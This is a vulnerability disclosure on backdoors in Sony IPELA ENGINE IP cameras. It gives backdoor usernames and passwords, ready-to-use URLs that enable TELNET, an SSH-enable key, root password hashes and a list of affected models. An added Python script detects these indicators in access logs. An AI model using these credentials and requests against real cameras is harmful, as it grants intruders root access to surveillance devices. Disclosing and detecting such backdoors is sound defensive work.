sony_IPELA_ENGINE_IP_Cameras_backdoor

   Multiple backdoors have been found in Sony IPELA ENGINE IP cameras; they allow an attacker to gain root privileges on the device.


POC1: Backdoor accounts
   debug/popeyeConnection
    primana/primana

POC2: Using the backdoor accounts to enable TELNET/SSH
   Enable TELNET: tested successfully on the Gen5-series device SNC-DH160
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

   Note: Gen6-series devices have an SSH service that can be enabled. The request content is slightly different: it is the string "himitunokagi" (Japanese for "secret key").
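
For defenders, the accounts and CGI path listed above can serve as detection indicators. The following is an added example, not part of the original write-up or of Sony's software: it scans HTTP access-log lines for use of the backdoor accounts or the factory CGI. It assumes a reverse proxy or HTTP-aware sensor in front of the cameras that writes Combined Log Format including the Basic-auth user; the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Indicators taken from the write-up above.
BACKDOOR_USERS = {"primana", "debug"}
FACTORY_CGI = "/command/prima-factory.cgi"

# Combined Log Format: src ident authuser [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not captured traffic); the parameter value is a placeholder.
SAMPLE_LOG = [
    '10.0.5.23 - primana [06/Dec/2016:10:12:01 +0000] '
    '"GET /command/prima-factory.cgi?foo=bar&Telnet=PLACEHOLDER HTTP/1.1" 200 12',
    '10.0.5.23 - - [06/Dec/2016:10:12:05 +0000] "GET /command/prima-factory.cgi HTTP/1.1" 401 0',
    '10.0.9.4 - admin [06/Dec/2016:10:13:00 +0000] "GET /index.html HTTP/1.1" 200 230',
    '10.0.5.40 - debug [06/Dec/2016:10:14:11 +0000] "GET /index.html HTTP/1.1" 200 900',
]

def classify(line):
    """Return the reasons a log line is suspicious (empty list if none or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    url = urlsplit(m["target"])
    if m["user"].lower() in BACKDOOR_USERS:
        reasons.append("backdoor-account:" + m["user"])
    # Decode percent-escapes so an encoded path does not slip past the comparison.
    if unquote(url.path).lower() == FACTORY_CGI:
        reasons.append("factory-cgi")
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if "telnet" in params:
            reasons.append("telnet-enable-attempt")
        if m["status"].startswith("2"):
            reasons.append("request-succeeded")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    return [(i, r) for i, line in enumerate(lines, 1) if (r := classify(line))]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(lineno, ", ".join(reasons))
```

A hit with `request-succeeded` on a camera means the device should be treated as compromised and checked for an open TELNET/SSH listener.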

POC3: Built-in root account on the device
    root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
    root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

Test environment:
    SNC-DH160 version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).
    Gen6 cameras V2.7.0 (snc-g6-series-v2-7-0.zip)


Products confirmed affected by Sony:
   SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER585H, SNC-ZP550, SNC-ZR550

SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C

SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,
SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,
SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,
SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,
SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,
SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,
SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,
SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,
SNC-WR602CL

Reference / translation source: https://packetstormsecurity.com/files/140051/Sony-IPELA-ENGINE-IP-Cameras-Backdoor-Accounts.html
